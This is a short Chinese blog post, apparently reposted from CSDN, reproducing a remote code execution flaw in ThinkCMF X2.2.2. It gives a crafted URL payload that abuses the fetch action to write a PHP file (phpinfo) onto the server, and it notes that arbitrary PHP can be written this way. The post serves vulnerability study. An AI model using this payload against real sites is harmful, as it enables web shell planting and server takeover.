ThinkCMF X2.2.2漏洞复现

1.搭建环境

下载ThinkCMF X2.2.2文件,把文件放入网站目录下,打开网站,按照提示一步步进行安装。(thinkCMF安装包,百度搜索获取)

2.漏洞概述

攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

3.漏洞利用

通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件,下面将把PHP查看配置函数phpinfo()写入test.php文件
phpinfo版payload如下

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
执行payload,页面将是空白的
在这里插入图片描述访问test.php
在这里插入图片描述
到达这一步你就可以向服务器写入任意PHP文件,实现远程控制,构造恶意URL等。,

猜你喜欢

转载自blog.csdn.net/xu_1234567/article/details/108548739